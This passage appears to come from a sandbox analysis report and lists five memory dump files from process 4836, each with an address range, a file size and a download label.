                  • memory/4836-14744-0x00000000027F0000-0x0000000002870000-memory.dmp

                    Filesize

                    512KB

                    Download

                  • memory/4836-14745-0x0000000002410000-0x0000000002418000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/4836-14746-0x00000000027F0000-0x0000000002870000-memory.dmp

                    Filesize

                    512KB

                    Download

                  • memory/4836-14748-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

                    Filesize

                    9.6MB

                    Download

                  • memory/4836-14740-0x000000001B300000-0x000000001B5E2000-memory.dmp

                    Filesize

                    2.9MB

                    Download